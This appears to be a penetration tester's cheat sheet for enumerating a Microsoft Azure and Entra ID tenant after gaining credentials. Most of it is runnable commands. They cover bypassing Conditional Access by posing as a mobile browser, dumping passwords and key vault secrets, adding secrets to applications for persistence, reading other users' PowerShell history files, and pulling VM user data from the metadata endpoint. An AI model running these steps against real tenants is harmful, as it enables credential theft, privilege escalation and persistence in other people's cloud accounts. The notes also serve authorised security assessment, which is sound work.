Authenticated Enumeration

This typically happens after the initial credentials or access tokens are gained through other means.

Tooling

You can also use https://portal.azure.com, remember that Conditional Access Policies might be circumvented by just pretending to be a mobile device.

You can use manual tools (might be less suspicious)

• AzureAD
• Az
• az-cli
• MS-Graph
• Using HTTP Requests

You can also use more gui-y tools for this

• Authenticated Enumeration
• RoadTools
• StormSpotter
• AzureHound
• AADInternals
• graphrunner

Enumerate after Access

• if you get an ‘subscription == null’ error → revert to HTTP calls
• always try to login into portal azure web interface with gained accounts
  • and check ‘all resources’ and ‘resource groups’
    • esp. if there is some form of deploment history
    • if you get an Conditional Access Error → Try setting browser style to mobile/tablet

Basic resource access

Get-AzResource
Get-AzResourceGroup
Get-AzResourceGroupDeployment
Save-AzResourceGroupDeploymentTemplate
Get-AzRoleAssignment  # this is not recursive, must use -scope <scope>

remember that there is a special keyvault access token!

Basic User Access

Get-AzureCurrentUser # powerzure
Get-AzureTarget      # powerzure
Get-AzAdGroup        # look for interesting groups (dynamic groups, authentication admin, device admins)
Get-AzPassword       # microburst, might need special keyvault token
Get-AzureADMSAdministrativeUnit
 
Get-AzureADDirectoryRole
Get-AzureADDirectoryRoleMember
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
 
# az might support recursive queries
az logon -u '' -p ''
az role assignment list --assignee 0ccd6182-b034-4e13-a155-1021e7d22d22 --include-groups --include-inherited --query '[].[principalName, roleDefinitionName, principalType, scope]' -o table

use http call to get all groups that a user is member of

check applications

Get-AzAdApplication
 
# load azuread
Get-AzureADGroupAppRoleAssignment
Get-AzureADApplication -SearchString <application>
 
# try to add secrets to application (does not need subscription)
Add-AzADAppSecret -GraphToken $token

manually verify VM access rights

If you spot a VM, check for:

• executor rights
• install Vm extension rights
• attached user data

Remember to both try ‘username’ and ‘.\username’

$Token = (Get-AzAccessToken).Token
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/infradminsrv/providers/Microsoft.Authorization/permissions?api-version=2015-07-01'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
	'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

use HTTP access with https://graph.microsoft.com/v1.0/users/[email protected]/memberOf” to check group memberships

get interesting groups and roles

Get-AzAdGroups
 
# interesting: VM Admins, Automation Admins
Get-AzureGroupMember
Get-AzureADGroupOwner
Get-AzureADGroupMember
 
# can also directly search for owned objects
Get-AzureADUserOwnedObject -ObjectId f66e133c-bd01-4b0b-b3b7-7cd949fd45f3 | select displayname
 
# get information about AD roles
# intersting: application administrators, global administrator, intune administrator, authenctication administrator
Get-AzureADDirectoryRole
Get-AzureADDirectoryRoleMember
 
# get dynamic groups
Get-AzureADMSGroup | ?{ $_.GroupTypes -eq 'DynamicMembership' }

get device/app owners

Import-Module .\PowerZure.psd1
Get-AzureDeviceOwners
Get-AzureAppOwners
Get-AzureRole -All
Get-AzureUser -All

list applications

Get-AzureADApplication
Get-ApplicationProxyAssignedUsersAndGroups.ps1

service principals (enterprise appliations)

Get-AzureADServicePrincipial # lists a lot

Some queries:

MATCH (a)-[r]-(t:AADRole) RETURN *
 
MATCH (a:AADUser)-[r]-(t) RETURN *

Enumerate after VM access

check local credentials

cat c:\users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
ls c:\transcripts
ls c:\users\*\.Azure
 
az ad signed-in-user show
az ad signed-in-user list-owned-objects
az resource list
az role assignment list --assignee <email>
 
# check if there is VM user data
$userData = Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-01-01&format=text"
 
[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($userData))
 
# check if device is azure enrolled (when real device)
dsregcmd /status
 
# if yes, then try to generate PRT